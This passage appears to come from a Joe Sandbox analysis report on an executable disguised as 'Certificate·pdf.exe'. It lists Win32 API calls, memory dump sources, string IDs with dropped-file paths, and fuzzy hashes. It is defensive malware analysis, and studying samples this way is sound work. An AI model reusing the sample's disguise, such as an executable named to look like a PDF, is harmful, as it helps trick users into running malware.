            • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
            • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
          • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
            • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
            • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
            • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
          • String ID: A$C:\Users\user\AppData\Local\Skamflelsens\fameless$Execute:
          • API String ID: 2624150263-3281777397
          • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
          • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
          • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
          • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
          APIs
          • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 004059D2
          • lstrcatW.KERNEL32(007A3F28,\*.*), ref: 00405A1A
          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A3D
          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405A43
          • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405A53
          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
          • FindClose.KERNEL32(00000000), ref: 00405B02
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
          • String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
          • API String ID: 2035342205-3342576968
          • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
          • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
          • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
          • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
          APIs
          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
          Strings
          • C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens, xrefs: 004021C3
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CreateInstance
          • String ID: C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens
          • API String ID: 542301482-2063836133
          • Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
          • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
          • Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
          • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
          APIs
          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
          • GetDlgItem.USER32(?,000003E8), ref: 0040447F
          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
          • GetSysColor.USER32(?), ref: 004044AD
          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
          • lstrlenW.KERNEL32(?), ref: 004044CE
          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
          • GetDlgItem.USER32(?,0000040A), ref: 00404549
          • SendMessageW.USER32(00000000), ref: 00404550
          • GetDlgItem.USER32(?,000003E8), ref: 0040457B
          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
          • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
          • SetCursor.USER32(00000000), ref: 004045CF
          • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
          • SetCursor.USER32(00000000), ref: 004045EB
          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
          • String ID: DC@$Execute: $N
          • API String ID: 3103080414-3191944959
          • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
          • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
          • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
          • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
          APIs
          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
          • BeginPaint.USER32(?,?), ref: 00401047
          • GetClientRect.USER32(?,?), ref: 0040105B
          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
          • DeleteObject.GDI32(?), ref: 004010ED
          • CreateFontIndirectW.GDI32(?), ref: 00401105
          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
          • SelectObject.GDI32(00000000,?), ref: 00401140
          • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
          • SelectObject.GDI32(00000000,00000000), ref: 00401160
          • DeleteObject.GDI32(?), ref: 00401165
          • EndPaint.USER32(?,?), ref: 0040116E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
          • String ID: F
          • API String ID: 941294808-1304234792
          • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
          • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
          • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
          • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
          APIs
          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
          • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
            • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
            • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
          • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
          • wsprintfA.USER32 ref: 00405F62
          • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
          • GlobalFree.KERNEL32(00000000), ref: 0040604B
          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
            • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
            • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
          • String ID: %ls=%ls$[Rename]
          • API String ID: 2171350718-461813615
          • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
          • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
          • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
          • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
          APIs
          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Char$Next$Prev
          • String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
          • API String ID: 589700163-2120515890
          • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
          • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
          • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
          • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
          APIs
          • GetWindowLongW.USER32(?,000000EB), ref: 00404292
          • GetSysColor.USER32(00000000), ref: 004042D0
          • SetTextColor.GDI32(?,00000000), ref: 004042DC
          • SetBkMode.GDI32(?,?), ref: 004042E8
          • GetSysColor.USER32(?), ref: 004042FB
          • SetBkColor.GDI32(?,?), ref: 0040430B
          • DeleteObject.GDI32(?), ref: 00404325
          • CreateBrushIndirect.GDI32(?), ref: 0040432F
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
          • String ID:
          • API String ID: 2320649405-0
          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
          • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
          • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
          APIs
          • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
            • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: File$Pointer$ByteCharMultiWide$Read
          • String ID: 9
          • API String ID: 163830602-2366072709
          • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
          • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
          • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
          • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
          APIs
          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
          • GetMessagePos.USER32 ref: 00404BEC
          • ScreenToClient.USER32(?,?), ref: 00404C06
          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
